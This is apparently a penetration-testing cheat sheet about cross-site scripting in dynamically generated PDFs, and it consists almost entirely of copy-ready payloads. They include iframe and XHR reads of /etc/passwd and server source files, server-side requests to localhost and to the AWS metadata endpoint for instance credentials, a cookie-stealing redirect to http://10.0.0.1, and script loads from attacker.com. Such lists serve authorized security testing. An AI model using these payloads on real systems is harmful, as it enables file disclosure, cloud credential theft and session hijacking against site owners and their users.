XSS with Dynamic PDF
Last modified: 2023-04-01
If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.
Basic
<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>
"><h1>XSS</h1>
Path Disclosure
<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>
LFI/RFI
<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<iframe src="http://localhost/server-status" height="1000" width="1000"></iframe>
<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
LFI/RFI (XHR request)
<script>
x = new XMLHttpRequest();
x.onload = function() {
document.write(this.responseText)
};
x.open("GET", "file:///etc/passwd");
x.send();
</script>
Cookie Hijacking
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">
External Scripts
<script src="http://attacker.com/test.js"></script>
<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />
AWS Instances
<iframe src="http://169.254.169.254/latest/dynamic/instance-identity/" height=1000px width=1000px></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" height=1000px width=1000px></iframe>
wkhtmltopdf
If the website uses “wkhtmltopdf”, please also refer to this page.